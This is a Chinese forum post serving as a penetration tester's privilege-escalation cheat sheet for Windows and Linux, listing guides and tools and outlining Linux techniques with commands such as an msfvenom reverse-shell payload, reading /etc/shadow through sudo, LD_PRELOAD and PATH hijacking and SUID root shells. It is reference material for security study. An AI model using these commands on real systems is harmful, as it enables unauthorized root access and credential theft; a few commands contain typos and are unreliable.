吉沃运营专员 发表于 2022-3-11 16:20:20

权限提升



一、PrivEsc 指南

[*]HackTricks. 如果必须将一个链接带入渗透测试,那就是它。由 WinPEAS 和 LinPEAS 的创建者编写,PrivEsc 指南,也是其他一切的最佳指南之一
[*]Vulnhub PrivEsc Cheatsheet
[*]PrivEsc for MySQL https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
[*]https://toshellandback.com/2015/11/24/ms-priv-esc/
[*]https://www.ired.team/offensive-security/code-execution
[*]https://www.ired.team/offensive-security/code-injection-process-injection
[*]https://www.ired.team/offensive-security/privilege-escalation
[*]Conda's Priv Esc Video Playlist
[*]Metasploit/Empire PrivEsc - PTFM pg. 31

二、Windows
2.1 参考指南

[*]HackTricks: Windows
[*]PayloadsAllTheThings/Windows-PrivilegeEscalation
[*]https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
[*]https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842
[*]https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
[*]https://rahmatnurfauzi.medium.com/windows-privilege-escalation-scripts-techniques-30fa37bd194
[*]https://www.fuzzysecurity.com/tutorials/16.html
[*]https://www.greyhathacker.net/?p=738
[*]http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
[*]https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/
[*]https://xapax.github.io/security/#attacking_active_directory_domain/local_privilege_escalation/local_privilege_escalation/

2.2 Windows PrivEsc 工具

[*]WinPEAS (The Go-To) - 这些工具搜索本地可以权限提升的路径,可以利用这些路径并显示展示出来,以便轻松识别错误配置
[*]SeatBelt - Seatbelt 是一个 C# 项目,它从进攻性和防御性安全角度执行许多面向安全的主机调查 "安全检查"
[*]Windows Exploit Suggester Next Gen - WES-NG 是一个基于 Windows 的 systeminfo 实用程序输出的工具,它提供了操作系统易受攻击的漏洞列表,包括针对这些漏洞的任何利用
[*]Sherlock and Watson - 寻找缺失的补丁和知识库
[*]Accesschk.exe with the accept EULA flag - 一个 Microsoft Sysinternals 工具,非常适合审核系统上的权限以及审核其他系统上的权限。此版本是一个独立的实用程序,带有旧代码,允许自动接受 EULA 标志
[*]PrintSpoofer - 通过在 Windows 10 和 Server 2016/2019 上滥用 SeImpersonatePrivilege 从本地/网络服务到系统
[*]Rattler - Rattler 是一种自动识别 DLL 的工具,可用于 DLL 预加载攻击
[*]SharpImpersonation - 用户模拟工具 - 通过 Token 或 Shellcode 注入

[*]https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

2.3 Potato Exploits

[*]Rotten Potato - 新版本的 RottenPotato 作为 C++ DLL 和独立的 C++ 二进制文件 - 不需要 Meterpreter 或其他工具。当你拥有 SeImpersonate 或 SeAssignPrimaryToken 权限时,利用基于 BITS 服务的权限升级链,该服务在 127.0.0.1:6666 上具有 MiTM 侦听器
[*]Juicy Potato - RottenPotatoNG 的升级和武器化版本
[*]Sweet Potato - 从服务帐户到系统的各种本机 Windows 权限提升技术的集合
[*]Rogue Potato - 另一个从服务帐户到系统的 Windows 本地权限提升
[*]https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
[*]RemotePotato0 - 另一个从用户到域管理员的 "无法修复" Windows 权限提升

三、Linux
3.1 参考指南

[*]HackTricks - Linux
[*]https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
[*]https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
[*]https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/
[*]https://www.hackingarticles.in/linux-for-pentester-find-privilege-escalation/
[*]https://payatu.com/guide-linux-privilege-escalation
[*]https://www.youtube.com/watch?v=dk2wsyFiosg
[*]https://resources.infosecinstitute.com/topic/privilege-escalation-linux-live-examples/#gref
[*]https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
[*]https://xapax.github.io/security/#post_exploitation/privilege_escalation_-_linux/

3.2 Linux PrivEsc 工具

[*]LinPEAS - 这些工具搜索本地可以权限提升的路径,可以利用这些路径并显示展示出来,以便轻松识别错误配置
[*]LinEnum - 脚本化的本地 Linux 枚举和权限提升检查
[*]LSE - Linux 智能枚举,用于渗透测试和 CTF 的 Linux 枚举工具
[*]Unix Privesc Check - Unix-privesc-checker 是一个在 Unix 系统上运行的脚本 (在 Solaris 9、HPUX 11、各种 Linux、FreeBSD 6.2 上测试),试图找出可能允许本地非特权用户将权限提升给其他用户或访问本地应用程序 (例如数据库) 的错误配置
[*]Linux Exploit Suggester 2 - 下一代 Linux 内核 Exploit Suggester
[*]SUDO Killer - 通过 SUDO 滥用来提升 Linux 权限

3.3 Linux 中一些方法
3.3.1 基本
3.3.1.1 战略

[*]Check user
[*]Run enum scripts at increasing levels
[*]Run manual commands
[*]Check user home dir

[*]/var/backup, /var/log, history files

[*]Try quickest methods first
[*]Check internal ports
[*]Use Kernel exploits LAST

3.3.1.2 枚举 Linux 中的权限

[*]Users

[*]Accounts in /etc/passwd
[*]password hashes in /etc/shadow
[*]identified by a UID
[*]root = UID 0
[*]3 types

[*]Real - defined in /etc/passwd. who they actually are
[*]Effective - 当以另一个用户身份执行进程时,他们的有效 ID 设置为该用户的真实 ID

[*]Most Access Control decisions
[*]whoami

[*]Saved - 用于确保 SUID 进程可以暂时将用户的有效 IS 切换回他们的 Real ID 并再次切换回来,而不会丢失原始有效 ID 的踪迹

[*]Groups

[*]/etc/group
[*]主要和多个次要组
[*]默认主组与用户帐户同名

[*]Files/Dir

[*]拥有一个所有者和一个组
[*]权限:读写执行
[*]3 个权限集:所有者、组和所有其他人

[*]特殊权限

[*]setuid (SUID) 位 - 设置后,文件将以文件所有者的权限执行
[*]setgid (SGID) 位 - 当在文件上设置时,文件将以文件组的权限执行

[*]在目录上设置时,在该目录中创建的文件将继承目录本身的组

[*]查看权限

[*]#ls -l /file/path
[*]前 10 个字符是文件的权限
[*]第一个字符是类型:"-" 表示文件,"d" 表示目录
[*]SUID/SGID 权限在执行位置用 "s" 表示

[*]用户 ID 命令

[*]#id
[*]#cat /proc/$$/status | grep "id"

[*]Spawning root shells

[*]/bin/sh or /bin/bash
[*]"rootbash" suid

[*]制作 /bin/bash 可执行文件的副本 - 确保它由 root 用户拥有并设置了 SUID 位
[*]可以通过简单地执行带有 -p 标志的 rootbash 文件来生成 root shell
[*]这是一个持久的 shell

[*]自定义可执行文件

[*]当 root 进程执行你可以控制的另一个进程时

[*]msfvenom

[*]可用于生成可执行的 elf 文件
[*]$msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell.elf
[*]可以用 netcat 或 multi/handler 捕获

[*]Native reverse shells

[*]https://github.com/mthbernardes/rsg
[*]都可以用 netcat 监听器捕获

3.3.2 技术
3.3.2.1 Kernel exploits

[*]#uname -a Enumerate Kernel verison
[*]查找匹配的漏洞利用、编译和运行

[*]#searchsploit
[*]#linux-exploit-suggester-2.py
[*]# uname -ar
[*]# cat /etc/issue
[*]# cat /etc/*-release
[*]# cat /etc/lsb-release # Debian based
[*]# cat /etc/redhat-release # Redhat based

[*]https://github.com/spencerdodd/kernelpop
[*]https://github.com/SecWiki/linux-kernel-exploits
[*]https://github.com/lucyoa/kernel-exploits
[*]https://github.com/bcoles/kernel-exploits
[*]PTFM: Dirty Cow PrivEsc pg. 92

3.3.2.2 Service Exploits

[*]#ps aux | grep "^root"Show all processes runnign as root
[*]#netstat -nl Show all actice connections (look for services)
[*]尝试识别版本号并研究漏洞

[*]#<program> -v or --version show version number
[*]#dpkg -l | grep <program>
[*]#rpm -qa | grep <program>

[*]某些以 root 身份运行的进程可能会绑定到一个内部端口,通过该端口进行通信

[*]如果无法在目标机器上本地运行,可以使用 ssh 将端口转发到本地机器
[*]$ssh -R <本地端口>:127.0.0.1:<服务端口> <用户名>@<本地机器>
[*]运行 netstat 查看哪些服务正在监听 127.0.0.1:<port>,然后使用端口转发发送到目标端口

3.3.2.3 弱文件权限

[*]/etc/shadow

[*]可读 - 复制并破解 Root 用户哈希
[*]可写 - 使用新的 root 密码复制和编辑 shadow 文件

[*]/etc/passwd

[*]为了向后兼容,如果用户行的第二个字段是密码哈希,则优先于 /etc/shadow
[*]替换 root 的密码,或附加具有 root 权限的新用户
[*]删除第二个字段中的 x 就好像用户没有密码一样

[*]备份

[*]有些可以阅读以收集有趣的文件

3.3.2.4 滥用 sudo

[*]Rules in /etc/sudoers
[*]有用的命令

[*]#sudo -u <username> <program>
[*]# sudo -l (show what you can run)
[*]@ sudo -s
[*]#sudo -i
[*]#sudo /bin/bash
[*]#sudo passwd

[*]Shell 转义序列

[*]https://gtfobins.github.io/
[*]搜索可以作为 sudo 运行的命令/二进制文件,然后传递强制使用新 root shell 的参数

[*]滥用预期功能

[*]Read/write to files owned by root
[*]EX apache2 - 它将尝试读取作为参数传递的任何文件的第一行

[*]#sudo apache2 -f /etc/shadow

[*]环境变量

[*]通过 sudo 运行的程序可以从用户的环境中继承环境变量
[*]在 /etc/sudoers 文件中,选项 env_reset 和 env_keep 选项可用。 这些用#sudo -l 显示
[*]LD_PRELOAD 变量,可设置为共享对象文件 (.so) 的路径

[*]通过创建自定义共享对象和 init() 函数,我们可以在对象加载后立即执行代码
[*]如果真实用户 ID 与有效 ID 不同,则无法工作,另外,sudo 必须有 env_keep 选项
[*]#sudo LD_PRELOAD=<创建的共享对象的路径> <可以作为 sudo 运行的命令>

[*]LD_LIBRARY_PATH

[*]首先搜索共享库的目录集
[*]打印程序使用的共享库

[*]#ldd /usr/sbin/apache2

[*]通过创建一个与程序使用的名称相同的共享库,并将 LD_LIBRARY_PATH 设置为其父目录,程序将加载我们的共享库


[*]sudo 缓存

[*]PTFM: Sudo Caching - pg. 93

3.3.2.5 定时任务

[*]在拥有它们的用户的安全级别上运行
[*]默认使用 /bin/sh 和有限的环境变量运行
[*]cron 表文件 (crontabs) 存储 cron 作业的配置
[*]Cronjobs 位于 /var/spool/cron/ 或 /var/spool/cron/crontabs/
[*]系统范围的 crontab 位于 /etc/crontab
[*]如果可以写入一个通过 cronjob 运行的程序或脚本,我们可以用我们自己的代码重新编写它
[*]PATH 环境变量

[*]默认设置为 /usr/bin
[*]可以在 crontab 文件中覆盖
[*]如果 cronjob 脚本/程序不使用绝对路径并且路径目录之一是用户可写的,你可以创建与 cronjob 同名的程序或脚本

[*]通配符

[*]当通配符 (*) 提供给命令作为参数时,shell 将首先对通配符执行文件名扩展 (通配符)
[*]此过程将通配符替换为当前目录中文件和目录名称的空格分隔列表
[*]可以创建与命令行选项匹配的文件名,例如 "--help"

3.3.2.6 SUID/SGID 可执行文件

[*]查找设置了 SUID/SGID 位的文件

[*]#find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec la -l {} \; 2> /dev/null
[*]可以对 SUID/SGID 文件使用 shell 转义序列
[*]PTFM: BSUID and SGID - pg. 93

[*]已知漏洞 - 某些程序使用 SUID 文件作为其进程或安装的一部分

[*]搜索这些! 寻找进出口!

[*]共享对象注入

[*]使用 strace 跟踪从程序到它试图调用的任何共享对象的系统调用
[*]如果我们可以写入该位置,我们将创建一个将与程序一起运行的对象
[*]创建一个创建文件的 c 文件
[*]编译 c 文件

[*]PATH 环境变量

[*]如果一个程序试图通过仅使用该程序而不是绝对路径来执行另一个程序,我们可以告诉 shell 去哪里寻找
[*]寻找易受攻击的程序

[*]这些子安全文件通常在程序中作为字符串被提及
[*]在主机可执行文件上运行字符串
[*]也可以使用 strace 与 ltrace
[*]#strace -v -f -e execve <命令> 2>&1 | grep 执行
[*]攻击

[*]创建新的 shell 可执行文件命名子执行的服务
[*]将路径变量设置为新创建的可执行文件的路径
[*]#PATH=.:$PATH <要执行的主机文件>

[*]滥用 shell 功能

[*]旧版本 < 4.2-048 可以用绝对路径名定义用户函数

[*]这些可以导出并且可以优先于被调用的实际可执行文件
[*]#function <service oyu 想冒充> { /bin/bash -p; )
[*]#export -f /user/sbin/service

[*]可以使用 -x 命令或修改 SHELLOPTS 以包含 xtrace 来启用调试模式

[*]SHELLOPTS 是只读的,但是 env 命令允许设置 SHELLOPS
[*]在调试模式下,Bash 使用 env var PS4 显示调试语句的额外提示,该变量可以包含嵌入式命令
[*]如果一个 SUID 文件通过 bash 运行另一个文件,则可以继承这些 envi 变量
[*]这不适用于 4.4 之后的 bash


[*]Linux Privilege Escalation using SUID Binaries

3.3.2.7 密码和密钥

[*]PWs 服务可以以纯文本形式存储在配置文件中
[*]历史文件可能包含用作命令一部分的密码

[*]#ls -a -> look for _history files

[*]配置文件

[*]opnevpn files -> auth-user-pass option

[*]SSH 密钥 - 可用于 leu 的密码

3.3.2.8 NFS

[*]在 /etc/exports 下配置的共享

[*]创建的文件继承远程用户的 UID 和 GUID,即使他们在本地没有帐户

[*]命令

[*]# showmount -e [目标]
[*]# nmap -sV -script=nfs-showmount [目标]
[*]#mount -o rw,vers=2 [目标]:[共享] [本地目录]

[*]Linux Privilege Escalation using Misconfigured NFS

3.3.2.9 Python 库劫持

[*]Linux Privilege Escalation: Python Library Hijacking

3.3.2.10 其他

[*]Editing /etc/passwd File for Privilege Escalation
[*]Linux Privilege Escalation using LD_Preload
[*]Linux Privilege Escalation Using PATH Variable
[*]Linux For Pentester: socat Privilege Escalation
[*]Linux for Pentester: scp Privilege Escalation
[*]Linux For Pentester: tmux Privilege Escalation
[*]Linux for Pentester: ed Privilege Escalation
[*]Linux for Pentester: sed Privilege Escalation
[*]Linux for Pentester: pip Privilege Escalation
[*]Linux for Pentester: git Privilege Escalation
[*]Linux for Pentester: cp Privilege Escalation
[*]Linux for Pentester: Taskset Privilege Escalation
[*]Linux for Pentester: Time Privilege Escalation
[*]Linux for Pentester: xxd Privilege Escalation
[*]Linux for Pentester : ZIP Privilege Escalation
[*]Linux for Pentester: APT Privilege Escalation
[*]Linux for Pentester: CAT Privilege Escalation
[*]Linux for Pentester: Find Privilege Escalation
[*]Linux for Pentester: Wget Privilege Escalation

页: [1]
查看完整版本: 权限提升